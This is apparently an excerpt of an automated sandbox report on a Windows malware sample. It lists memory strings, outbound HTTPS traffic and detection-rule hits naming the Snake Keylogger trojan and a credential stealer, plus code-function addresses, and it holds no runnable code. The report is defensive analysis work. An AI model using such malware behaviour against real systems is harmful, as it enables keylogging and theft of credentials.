                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004363000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3704854861.0000000004202000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3704772629.0000000004650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003509000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: aoTiGLRa.exe, 00000014.00000002.3699672767.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                      Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49795 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49815 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_0153DE340_2_0153DE34
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_074804600_2_07480460
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_0748BAC80_2_0748BAC8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_074880E80_2_074880E8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_074804520_2_07480452
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_0748E4180_2_0748E418
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_074874880_2_07487488
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_0748B3C90_2_0748B3C9
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_0748B3D80_2_0748B3D8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076FDD850_2_076FDD85
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076F66280_2_076F6628
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076F85700_2_076F8570
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076F81380_2_076F8138
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076F7EC70_2_076F7EC7
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076F6E890_2_076F6E89
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076F6E980_2_076F6E98
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 0_2_076F6A600_2_076F6A60
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0119318814_2_01193188
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_01197C1914_2_01197C19
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_01194E1C14_2_01194E1C
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0119307014_2_01193070
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0119C7D014_2_0119C7D0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_01192D5414_2_01192D54
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174C14714_2_0174C147
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174536214_2_01745362
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174D27814_2_0174D278
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174C46814_2_0174C468
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174C73814_2_0174C738
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_017469A014_2_017469A0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174E98814_2_0174E988
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174CA0814_2_0174CA08
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_01749DE014_2_01749DE0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174CCD814_2_0174CCD8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_01746FC814_2_01746FC8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174CFAB14_2_0174CFAB
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_01743E0914_2_01743E09
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174E97B14_2_0174E97B
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174F96114_2_0174F961
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_0174394B14_2_0174394B
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC1E8014_2_06CC1E80
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC17A014_2_06CC17A0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCFC6814_2_06CCFC68
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC9C7014_2_06CC9C70
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC954814_2_06CC9548
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC0B3014_2_06CC0B30
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC502814_2_06CC5028
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC296814_2_06CC2968
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCE6AF14_2_06CCE6AF
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCE6B014_2_06CCE6B0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC1E7014_2_06CC1E70
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCDE0014_2_06CCDE00
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC178F14_2_06CC178F
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCEF5B14_2_06CCEF5B
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCEF6014_2_06CCEF60
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCCCA014_2_06CCCCA0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC9C6B14_2_06CC9C6B
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCDDFF14_2_06CCDDFF
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCD54B14_2_06CCD54B
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCD55014_2_06CCD550
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC953B14_2_06CC953B
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCEAFF14_2_06CCEAFF
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCE25814_2_06CCE258
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCE25314_2_06CCE253
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC8B9114_2_06CC8B91
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC8BA014_2_06CC8BA0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCF3B814_2_06CCF3B8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCEB0814_2_06CCEB08
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC0B2014_2_06CC0B20
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCD0F814_2_06CCD0F8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC004014_2_06CC0040
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCF80B14_2_06CCF80B
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC000714_2_06CC0007
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CC501814_2_06CC5018
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCF81014_2_06CCF810
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCD9A814_2_06CCD9A8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 14_2_06CCD9A314_2_06CCD9A3
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_02D6DE3417_2_02D6DE34
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_059570A017_2_059570A0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_059580E817_2_059580E8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_0595BAC817_2_0595BAC8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_0595045117_2_05950451
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_0595046017_2_05950460
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_0595B3D817_2_0595B3D8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_0595B3C917_2_0595B3C9
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 17_2_0595BABA17_2_0595BABA
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148296820_2_01482968
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148FC6820_2_0148FC68
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01489C1820_2_01489C18
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148502820_2_01485028
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148932820_2_01489328
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01480B3020_2_01480B30
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_014817A020_2_014817A0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148E25820_2_0148E258
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01481E8020_2_01481E80
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148954820_2_01489548
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148D54020_2_0148D540
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148295A20_2_0148295A
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148D55020_2_0148D550
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148DDF120_2_0148DDF1
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148D99920_2_0148D999
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148D9A820_2_0148D9A8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148004020_2_01480040
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148F80220_2_0148F802
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148000620_2_01480006
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148501820_2_01485018
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148F81020_2_0148F810
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148D0E920_2_0148D0E9
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148D0F820_2_0148D0F8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148CC8F20_2_0148CC8F
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148CCA020_2_0148CCA0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148EF5120_2_0148EF51
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148EF6020_2_0148EF60
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148EB0820_2_0148EB08
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01480B2020_2_01480B20
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148178F20_2_0148178F
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01488B9120_2_01488B91
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148F3A820_2_0148F3A8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01488BA020_2_01488BA0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148F3B820_2_0148F3B8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148E25720_2_0148E257
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_01481E7020_2_01481E70
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148DE0020_2_0148DE00
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148EAF820_2_0148EAF8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148E6AF20_2_0148E6AF
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_0148E6B020_2_0148E6B0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AE54820_2_015AE548
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A81D020_2_015A81D0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A7B7820_2_015A7B78
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A772020_2_015A7720
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A8FB020_2_015A8FB0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AC55820_2_015AC558
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A0D4820_2_015A0D48
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AC54820_2_015AC548
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AA93820_2_015AA938
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AE53820_2_015AE538
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AA92820_2_015AA928
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AE9D820_2_015AE9D8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AC9D820_2_015AC9D8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AE9C820_2_015AE9C8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A15F820_2_015A15F8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AC9E820_2_015AC9E8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A15E820_2_015A15E8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A119F20_2_015A119F
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A11A020_2_015A11A0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A345020_2_015A3450
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A004020_2_015A0040
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A647820_2_015A6478
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A346020_2_015A3460
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AFC1820_2_015AFC18
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015ADC1920_2_015ADC19
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A300820_2_015A3008
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015ABC3820_2_015ABC38
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A603020_2_015A6030
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015ABC2A20_2_015ABC2A
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015ADC2820_2_015ADC28
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A602220_2_015A6022
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AC0C820_2_015AC0C8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A08F020_2_015A08F0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A049820_2_015A0498
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A648820_2_015A6488
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A38B820_2_015A38B8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AE0B820_2_015AE0B8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AC0B720_2_015AC0B7
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AE0A720_2_015AE0A7
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A275820_2_015A2758
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A274920_2_015A2749
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AF77820_2_015AF778
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A577020_2_015A5770
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A7B6920_2_015A7B69
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AB31820_2_015AB318
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AD30820_2_015AD308
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A230020_2_015A2300
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AB30720_2_015AB307
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A532820_2_015A5328
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A772220_2_015A7722
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A5BD820_2_015A5BD8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A2FF920_2_015A2FF9
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AD79820_2_015AD798
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AB79820_2_015AB798
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AF78820_2_015AF788
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A578020_2_015A5780
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AD78720_2_015AD787
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A2BB020_2_015A2BB0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AB7A820_2_015AB7A8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A2BA020_2_015A2BA0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A8FA120_2_015A8FA1
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A1A5020_2_015A1A50
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AEE5720_2_015AEE57
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A1A4F20_2_015A1A4F
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A4A7820_2_015A4A78
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015ACE7820_2_015ACE78
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A6E7220_2_015A6E72
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A6E7020_2_015A6E70
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AEE6820_2_015AEE68
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015ACE6720_2_015ACE67
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A6A1820_2_015A6A18
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A6A0720_2_015A6A07
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A462220_2_015A4622
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A462020_2_015A4620
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A4ED020_2_015A4ED0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A72CA20_2_015A72CA
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A72C820_2_015A72C8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A4EC020_2_015A4EC0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AF2F820_2_015AF2F8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A22F020_2_015A22F0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AD2F720_2_015AD2F7
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015AF2E720_2_015AF2E7
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A1E9820_2_015A1E98
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 20_2_015A1EA820_2_015A1EA8
